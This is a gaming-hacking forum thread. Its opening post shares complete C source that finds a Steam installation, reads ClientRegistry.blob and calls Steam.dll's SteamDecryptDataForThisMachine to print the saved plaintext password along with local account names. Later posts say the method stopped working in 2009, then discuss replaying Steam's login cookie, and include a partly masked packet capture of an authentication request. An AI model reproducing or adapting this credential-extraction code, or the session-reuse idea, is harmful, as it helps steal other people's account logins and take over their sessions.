Aluigi's Steampwd converted to C++ [source code here]

counterstrikewi · **Joined:** 19 Apr 2009 23:01 **Posts:** 13

Have a look at this code.

It decrypt's the saved Steam Passwords using the Steam.dll.

(I've added two functions and cleaned up the source.)

If you want to learn something this is your chance.

Code:

Code:

// DecryptStoredSteamPassword.c by wizard
//
// Combines Luigi's ClientRegistry.blob parsing function(s)
// with VALVe's exported SteamDecryptDataForThisMachine() function
//
// small code changes and comments added by desxor
// again some changes and fuctions were added by Five-Three-Nine


#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <sys/stat.h>
#include <windows.h>

void GetSteamDic(char *Path);

void SteamParseEncryptedPassPhrase(uint8_t *fname);
uint8_t *find_data(uint8_t *buff, int buffsz, uint8_t *str);

typedef int (__cdecl *SteamDecryptDataForThisMachine_t)(char *a, int b, char *c, int d, int *e);
SteamDecryptDataForThisMachine_t SteamDecryptDataForThisMachine;

int main(int argc, char *argv[]) {
   HANDLE hSteamDLL;

   /* Find Steam Dir */
   char SteamPath[100] = {};
   char SteamDll[100] = {};
   char SteamBlob[100] = {};
   char SteamUser[100] = {};
   GetSteamDic(SteamPath);
   
   strcat(SteamDll,SteamPath);
   strcat(SteamDll,"\\Steam.dll");
   
   strcat(SteamBlob,SteamPath);
   strcat(SteamBlob,"\\ClientRegistry.blob");
   
   strcat(SteamUser,SteamPath);
   strcat(SteamUser,"\\SteamApps\\*");
   
   printf("%s\n%s\n%s\n%s\n\n",SteamPath,SteamDll,SteamBlob,SteamUser);
   
   hSteamDLL = LoadLibrary(SteamDll);
   if(!hSteamDLL) {
      printf("\nError: the file STEAM.DLL has not been found.\n");
      exit(1);
   }

   SteamDecryptDataForThisMachine = (void *)GetProcAddress(hSteamDLL, "SteamDecryptDataForThisMachine");
   if(!SteamDecryptDataForThisMachine) {
      printf("\nError: the function SteamDecryptDataForThisMachine has not been found.\n");
      exit(1);
   }

   SteamParseEncryptedPassPhrase(SteamBlob);

   FreeLibrary(hSteamDLL);
   
   
   /* Addon: Find Steam Users */
   printf("\nSteam User Names:\n");
   HANDLE fHandle;
   WIN32_FIND_DATA wfd;

   fHandle=FindFirstFile(SteamUser,&wfd);

   do
   {
      if (!( (wfd.cFileName[0]=='.') && ( (wfd.cFileName[1]=='.' && wfd.cFileName[2]==0) || wfd.cFileName[1]==0 ) ))
      {
         if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
         {
            if((strcmp(wfd.cFileName,"SourceMods") != 0) && (strcmp(wfd.cFileName,"common") != 0))
            {
               printf("%s\n",wfd.cFileName);
            }

         }
      }   
   }
   while (FindNextFile(fHandle,&wfd));
   FindClose(fHandle);
   
   return(0);
}

void SteamParseEncryptedPassPhrase(uint8_t *fname) {
   int len, fdsize, pwds;
   uint16_t nlen;
   uint8_t *fdbuff, *fdnext, *p, *buff;
   char decpass[100];
   struct stat xstat;
   FILE *fd;

   fd = fopen(fname, "rb");
   if(!fd) {
      printf("Could not open %s for reading/memory search.\n", fname);
      exit(1);
   } else {
      fstat(fileno(fd), &xstat);
      fdbuff = malloc(xstat.st_size);

   if(!fdbuff) {
      printf("Could not allocate file into memory.\n");

      // comments for the following are pretty much the same as below so look there for
      // a more detailed description of what's going on

      len = strlen(fname);
      fdsize = 64 + len;

      fdbuff = malloc(fdsize);

        p = fdbuff;
        p += sprintf(p, "%-30s", "\x50\x68\x72\x61\x73\x65\x01\x50");

        *(uint16_t *)p = 0;
        p += 2;

        *(uint32_t *)p = len;
        p += 4 + 0;

        strcpy(p, fname);

        fclose(fd);
        goto next;
      }

   // load our file into memory for searching and reading its data
   fread(fdbuff, 1, xstat.st_size, fd);
   fclose(fd);

   fdsize = xstat.st_size;
   }
   
   next:
      fdnext = fdbuff;
      for(pwds = 0;; pwds++) {
      // search for unique phrase text using memcmp(), using a great little function provided by Luigi A.
      // his function will search the entire allocated memory for the data you specify and return with it
      // if its found, otherwise null

         p = find_data(fdnext, fdsize, "\x50\x68\x72\x61\x73\x65\x01\x50");

         if(!p) {
            if(pwds) break;
            printf("An encrypted and stored password could not be located, exiting.\n");
            exit(1);
            }

      // skip 30 bytes past the PHRASE text to the encrypted password until we come
      // to "04 00" or simply 4, (0x04 + (0x00 * 256)), we now have 24 bytes remaining
      p += 30;

      // this is the 16 bit number we are looking for, save it in the following format:
      // num = byte1 + (byte2 * 256)
      nlen = *(uint16_t *)p;

      // skip the next 2 bytes of the 16bit number we just saved
      p += 2;

      // after we skipped 2 bytes, we come to 32bit number (4 bytes) which should always be the
      // size of our encrypted string, it should appear as "5c 00 00 00", which equals 0x5c or simply, 92
      // save this in the same format as before
      len  = *(uint32_t *)p;

      // now we skip the 4 bytes that we _just read_ PLUS the amount of bytes specified by the first
      // 16 bit number we just saved, should be 2 bytes anyhow
      // this should now bring us to our encrypted password located in ClientRegistry.blob which should be
      // 92 (0x5c) characters long
      p += 4 + nlen;

      // an example of the data, provided by Luigi:
      // 50 68 72 61 73 65 01 50 7e 00 00 00 00 00 00 00   Phrase.P~.......
      // 04 00 04 00 00 00 01 00 00 00 02 00 00 00 04 00   ................
      // 5c 00 00 00 02 00 00 00 39 41 46 41 42 44 39 36   \.......9AFABD96
      // 32 30 43 45 43 34 39 31 46 38 33 44 43 45 31 32   20CEC491F83DCE12
      // 36 33 33 44 39 43 44 41 41 44 45 30 42 36 46 46   633D9CDAADE0B6FF
      // 41 32 42 42 45 30 31 32 45 38 39 32 37 33 36 39   A2BBE012E8927369
      // 35 32 35 37 43 44 43 45 39 35 37 32 41 37 30 38   5257CDCE9572A708
      // 38 42 32 43 41 43 30 33 37 44 43 38 33 33 36 33   8B2CAC037DC83363
      // 33 33 35 35 12 00 2a 00 00 00 43 6c 6f 63               3355..*...Cloc

      fdsize -= (p - fdnext);
      fdnext = p;

      // as long as our length is greater than zero but no bigger than fdsize, execute the exported decryption function
        if((len > 0) && (len < fdsize)) {
         // null terminate the end of our string, otherwise it will cause problems
         p[len] = 0;

         printf("Found stored encrypted password:\n \"%s\"\n\n", p);

         if(!SteamDecryptDataForThisMachine(p, strlen(p), decpass, sizeof(decpass), &len)) {
            printf("Password: %.*s\n\n", len, decpass);
         } else {
            printf("Unable to decrypt the stored password, is this the same machine it was encrypted on?\n");
         }
        }
      }
      
   free(fdbuff);
}

uint8_t *find_data(uint8_t *buff, int buffsz, uint8_t *str) {
   int strsz;
   uint8_t *limit;

   strsz = strlen(str);
   limit = buff + buffsz - strsz;

   for(; buff <= limit; buff++) {
      if(!memcmp(buff, str, strsz)) return(buff);
   }
   
return(NULL);
}

void GetSteamDic(char *Path) {
   HKEY hKey;
   DWORD size;

   RegOpenKey(HKEY_LOCAL_MACHINE, "Software\\Valve\\Steam", &hKey);
   RegQueryValueEx(hKey, "InstallPath", NULL, NULL,Path, &size);
   RegCloseKey(hKey);
}

peace

counterstrikewi

diablosephiroth27 · **Joined:** 11 Oct 2009 01:08 **Posts:** 3

it'snot c++, it's C

Will · **Joined:** 13 Sep 2010 20:33 **Posts:** 8

Hello, i??m sorry for pushing this old thread but i cant find the text "Phrase" in the clientregistry.blob.
I used a normal Hexeditor and IDA to find this "Phrase.P", .. nothing -.-

Code:

      // an example of the data, provided by Luigi:
      // 50 68 72 61 73 65 01 50 7e 00 00 00 00 00 00 00   Phrase.P~.......
      // 04 00 04 00 00 00 01 00 00 00 02 00 00 00 04 00   ................
      // 5c 00 00 00 02 00 00 00 39 41 46 41 42 44 39 36   \.......9AFABD96
      // 32 30 43 45 43 34 39 31 46 38 33 44 43 45 31 32   20CEC491F83DCE12
      // 36 33 33 44 39 43 44 41 41 44 45 30 42 36 46 46   633D9CDAADE0B6FF
      // 41 32 42 42 45 30 31 32 45 38 39 32 37 33 36 39   A2BBE012E8927369
      // 35 32 35 37 43 44 43 45 39 35 37 32 41 37 30 38   5257CDCE9572A708
      // 38 42 32 43 41 43 30 33 37 44 43 38 33 33 36 33   8B2CAC037DC83363
      // 33 33 35 35 12 00 2a 00 00 00 43 6c 6f 63               3355..*...Cloc

I want to learn that stuff, dont just c&p this, could anyone help me pleace ?

Will

aluigi · **Posted:** 13 Sep 2010 22:18

you don't find it because it no longer exists.

from the description of steampwd:
"IMPORTANT NOTE: from the 29 Sep 2009 Steam no longer saves the full password so this tool is now totally useless."

Will · **Joined:** 13 Sep 2010 20:33 **Posts:** 8

Thanks !,

so the password wont be saved by the steam.dll complete in one string, but its still complete in the clientregistry.blob, right?

Will

Sethioz · **Posted:** 14 Sep 2010 15:30

NO, it does not exist like Luigi said.

Will · **Joined:** 13 Sep 2010 20:33 **Posts:** 8

Ok, thanks im sorry.

So when it doesnt exist, how Steam can remember the login-datas itself ?
It doesnt store the data on a sql-database, does it ?

Will

Sethioz · **Posted:** 14 Sep 2010 22:57

you was asking about password, not the login data.
Luigi have explained this somewhere in detail. basically it works like a password hash.
it uses the encrypted password to login it, which is not reversable, it can only be cracked using brute force or by guessing the word (wordlist attack). i cant remember what kind of protocol it used exactly, but thats the idea behind it.

im sure that only reason why you want this, is to plant a trojan into somebody's computer or go to your friend's place and steal their password. so in that case, you can steal their login info, which allows you to log into their account (if you are smart and know what to do), but you can not change password.

SomaFM · **Joined:** 16 Aug 2007 06:25 **Posts:** 367

Sethioz wrote:

im sure that only reason why you want this, is to plant a trojan into somebody's computer or go to your friend's place and steal their password. so in that case, you can steal their login info, which allows you to log into their account (if you are smart and know what to do), but you can not change password.

What proof do you have of that? Who cares what he does it for? There's no need to make assumptions and try to belittle him. Just answer his question and move along.

Will · **Joined:** 13 Sep 2010 20:33 **Posts:** 8

Thanks,

At first, i dont want to write any trojan.
Im learning about cryptography and realy want to encrypt stuff by myself.

So far that are bad news that this kind of hash is not reversable, however i trust you and give it up -.-

Bruteforcing i think will be detected by the Server anyway.

Thank you guys !

aluigi · **Posted:** 15 Sep 2010 08:44

it's not really an hash, but just a cookie (also known as "ticket" probably) like those used to login on the forums via the browser

Will · **Joined:** 13 Sep 2010 20:33 **Posts:** 8

Thanks aluigi!

So when it works like a cookie it have to be stored clientside.
So i have read some stuff about that and i know that the username is saved in an encryptet form as a registrykeyname in the ConnectCache.

Now to the value of this key, is this a encryptet form of the password to match with the "hash" serverside?
Or is this value generated serverside after the first login and assigned to it?
And finaly, witch funktion of the steam.dll is responsible for it?

Thanks !!! , Will

aluigi · **Posted:** 16 Sep 2010 08:20

the cookie is generated server-side, come on it's a cookie :)

for the function it's an internal one, I don't remember to have seen it exported by the dll

Will · **Joined:** 13 Sep 2010 20:33 **Posts:** 8

Yes, its a damn cookie (;

Thank you

Sethioz · **Posted:** 17 Sep 2010 16:57

what is your goal ?
reverse it ? crack it ? login using the "cookie" ?

Will · **Joined:** 13 Sep 2010 20:33 **Posts:** 8

How my goal looks like?
- A programm, which starts up and showing your own password or login automaticly.

How it will be done is pretty equal :)

"Reverse it" - is there something to reverse, its a cookie?!?
"crack it" - like a bruteforce-attack, i think it would be the last way by everyone or not?
"login using the cookie" - if its possible, why not ? :)

Thanks

Sethioz · **Posted:** 19 Sep 2010 14:54

Quote:

- A programm, which starts up and showing your own password or login automaticly.

password or login ? which one ?
still confusing and what would be the possible purpose of this, if i can ask ?

obviously if you use the same "cookie" that steam, then you can login.

Will · **Joined:** 13 Sep 2010 20:33 **Posts:** 8

I??m sorry for my confusing english ;)

The program have to show only the password.
Or it have to login me, if its possible.

You say if i use the same cookie as steam use, i can login....
The strings of a cookie are only visible by "sniffing" them, right ?

Found this by using wireshark:

Code:

0000  00 04 0e 47 b9 20 00 1a  4d 5b 30 a8 08 00 45 00   ...G. .. M[0...E.
0010  03 7f 69 e4 40 00 80 06  00 00 c0 a8 b2 16 3f e4   ..i.@... ......?.
0020  df 6e ce 86 00 50 76 93  68 4c 85 45 a5 f6 50 18   .n...Pv. hL.E..P.
0030  41 3a 95 83 00 00 50 4f  53 54 20 2f 49 53 74 65   A:....PO ST /ISte
0040  61 6d 55 73 65 72 41 75  74 68 2f 41 75 74 68 65   amUserAu th/Authe
0050  6e 74 69 63 61 74 65 55  73 65 72 2f 76 30 30 30   nticateU ser/v000
0060  31 2f 20 48 54 54 50 2f  31 2e 31 0d 0a 63 6f 6e   1/ HTTP/ 1.1..con
0070  74 65 6e 74 2d 74 79 70  65 3a 20 61 70 70 6c 69   tent-typ e: appli
0080  63 61 74 69 6f 6e 2f 78  2d 77 77 77 2d 66 6f 72   cation/x -www-for
0090  6d 2d 75 72 6c 65 6e 63  6f 64 65 64 0d 0a 68 6f   m-urlenc oded..ho
00a0  73 74 3a 20 61 70 69 2e  73 74 65 61 6d 70 6f 77   st: api. steampow
00b0  65 72 65 64 2e 63 6f 6d  0d 0a 41 63 63 65 70 74   ered.com ..Accept
00c0  3a 20 74 65 78 74 2f 68  74 6d 6c 2c 2a 2f 2a 3b   : text/h tml,*/*;
00d0  71 3d 30 2e 39 0d 0a 41  63 63 65 70 74 2d 45 6e   q=0.9..A ccept-En
00e0  63 6f 64 69 6e 67 3a 20  67 7a 69 70 2c 69 64 65   coding:  gzip,ide
00f0  6e 74 69 74 79 2c 2a 3b  71 3d 30 0d 0a 41 63 63   ntity,*; q=0..Acc
0100  65 70 74 2d 43 68 61 72  73 65 74 3a 20 49 53 4f   ept-Char set: ISO
0110  2d 38 38 35 39 2d 31 2c  75 74 66 2d 38 2c 2a 3b   -8859-1, utf-8,*;
0120  71 3d 30 2e 37 0d 0a 43  6f 6e 6e 65 63 74 69 6f   q=0.7..C onnectio
0130  6e 3a 20 6b 65 65 70 2d  61 6c 69 76 65 0d 0a 55   n: keep- alive..U
0140  73 65 72 2d 41 67 65 6e  74 3a 20 56 61 6c 76 65   ser-Agen t: Valve
0150  2f 53 74 65 61 6d 20 48  54 54 50 20 43 6c 69 65   /Steam H TTP Clie
0160  6e 74 20 31 2e 30 0d 0a  43 6f 6e 74 65 6e 74 2d   nt 1.0.. Content-
0170  4c 65 6e 67 74 68 3a 20  35 32 36 0d 0a 0d 0a 66   Length:  526....f
0180  6f 72 6d 61 74 3d 76 64  66 26 73 74 65 61 6d 69   ormat=vd f&steami
0190  *************************************   d=****** ********
01a0  35 32 30 26 73 65 73 73  69 6f 6e 6b 65 79 3d 34   ***&sess ionkey=*
01b0  25 41 35 25 42 37 50 25  34 30 25 35 45 6b 25 44   %**%***% **%***%*
01c0  39 *********** 38 25  33 45 25 41 41 7a 25 31   ******************
01d0  41 4b 25 30 38 5f 25 43  37 25 45 45 25 46 46 25   AK%08_%C 7%EE%FF%
01e0  42 46 25 31 42 25 38 42  25 46 41 25 45 35 25 34   BF%1B%8B %FA%E5%4
01f0  30 25 44 39 25 32 33 2e  25 31 44 25 41 43 25 42   0%D9%23. %1D%AC%B
0200  31 69 6e 25 30 43 4c 25  44 36 4a 25 42 38 25 32   1in%0CL% D6J%B8%2
0210  34 2e 25 38 42 25 31 41  25 31 36 25 31 46 25 46   4.%8B%1A %16%1F%F
0220  35 77 25 38 37 25 38 36  25*******41 41 25 38   ********************
0230  31 25 38 46 25 37 46 25  45 36 25 33 45 25 46 33   1%8F%7F% E6%3E%F3
0240  25 38 30 25 45 38 25 41  30 25 46 33 25 39 45 25   %80%E8%A 0%F3%9E%
0250  32 32 25 30 44 25 39 39  41 64 37 25 43 41 25 44   22%0D%99 Ad7%CA%D
0260  46 25 38 36 37 59 25 31  42 25 31 39 4a 44 6c 25   F%867Y%1 B%19JDl%
0270  32 33 25 37 45 25 43 35  25 39 37 25 45 37 25 46   23%7E%C5 %97%E7%F
0280  34 25 41 35 25 30 33 25  31 39 25 37 42 25 30 37   4%A5%03% 19%7B%07
0290  25 46 36 68 25 44 45 43  4a 25 35 45 25 43 30 25   %F6h%DEC J%5E%C0%
02a0  43 36 56 25 44 45 25 31  33 25 42 34 39 25 41 45   C6V%DE%1 3%B49%AE
02b0  25 30 45 25 39 31 25 42  31 25 42 36 25 42 38 25   %0E%91%B 1%B6%B8%
02c0  32 43 25 **********************2 33 25 45   *****************
02d0  43 25 31 43 72 5a 25 41  37 66 25 43 43 25 43 46   C%1CrZ%A 7f%CC%CF
02e0  25 31 45 25 46 32 25 43  31 25 30 35 25 46 32 25   %1E%F2%C 1%05%F2%
02f0  43 37 25 38 45 26 65 6e  63 72 79 70 74 65 64 5f   C7%8E&en crypted_
0300  6c 6f 67 69 6e 6b 65 79  3d 25 43 32 25 32 37 25   loginkey =*******
0310  30 4**************1  25 38 44 25 38 30 25 45  *****************
0320  30 64 25 46 31 25 45 39  65 25 46 34 25 43 42 25   0d%F1%E9 e%F4%CB%
0330  31 37 25 41 35 25 32 32  25 41 45 25 32 35 25 43   17%A5%22 %AE%25%C
0340  36 25 32 38 25 45 41 25  39 35 25 38 38 25 41 31   6%28%EA% 95%88%A1
0350  59 25 39 46 25 39 39 25  33 44 6a 25 41 39 25 43   Y%9F%99% 3Dj%A9%C
0360  31 4e ************************38 35 25 32   ******************
0370  .. .. .. . . . . .
0380  ...

And recieve this:

Code:

a uthentic
0040  61 74 65 75 73 65 72 22  0a 7b 0a 09 22 74 6f 6b   ateuser" .{.."tok
0050  65 6e 22 09 22 37 36 35  36 31 31 39 37 39 38 34   en"."*** 61197***
...

I??m on the right way?
Thanks

Sethioz · **Posted:** 20 Sep 2010 17:49

as explained, you can not show the password. obviously you can log user in, cuz credentials are saved somewhere.
Luigi has to answer you about that part.

i still do not understand, what is the purpose of this ? if you save credentials on steam, it logs you in automatically.

Luigi Auriemma

Aluigi's Steampwd converted to C++ [source code here]